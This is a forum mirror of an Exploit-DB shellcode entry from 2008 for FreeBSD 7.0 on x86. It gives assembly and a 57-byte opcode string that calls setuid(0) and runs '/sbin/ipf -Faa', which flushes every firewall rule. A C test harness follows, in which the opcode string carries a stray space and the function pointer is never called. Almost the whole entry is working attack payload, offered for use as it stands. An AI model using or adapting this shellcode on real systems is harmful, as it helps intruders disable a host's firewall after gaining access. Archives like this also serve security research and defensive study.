- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13268
- Проверка EDB
-
- Пройдено
- Автор
- SM4X
- Тип уязвимости
- SHELLCODE
- Платформа
- FREEBSD_X86
- CVE
- N/A
- Дата публикации
- 2008-08-21
Код:
; sm4x - 2008
; setuid(0); execve("//sbin/ipf", {"//sbin/ipf", "-Faa", 0}, 0);
; 57 bytes
; FreeBSD 7.0-RELEASE
global _start
_start:
main:
; --------------------- setuid (0)
xor eax, eax
xor ecx, ecx
push eax
push eax
mov al, 0x17
int 0x80
; --------------------- -Faa
xor eax, eax
push eax
push 0x6161462d ; -Faa
mov ecx, esp
; --------------------- setup //sbin/ipf
push eax
push word 0x6670
push 0x692f6e69
push 0x62732f2f
mov ebx, esp
; ---------------------- array setup
push eax
push ecx
push ebx
mov ecx, esp
; ---------------------- call to execve
push eax
push ecx
push ebx
mov al, 0x3b
push eax
int 0x80
xor eax, eax
push eax
push eax
int 0x80
/*
char code[] = "\x31\xc0\x31\xc9\x50\x50\xb0\x17\xcd \x80"
"\x31\xc0\x50\x68\x2d\x46\x61\x61\x89\xe1"
"\x50\x66\x68\x70\x66\x68\x69\x6e\x2f\x69"
"\x68\x2f\x2f\x73\x62\x89\xe3\x50\x51\x53"
"\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd\x80"
"\x31\xc0\x50\x50\xcd\x80";
int main(int argc, char **argv) {
int (*func)();
printf("Bytes: %d\n", sizeof(code));
func = (int (*)()) code;
}
*/
// milw0rm.com [2008-08-21]- Источник
- www.exploit-db.com
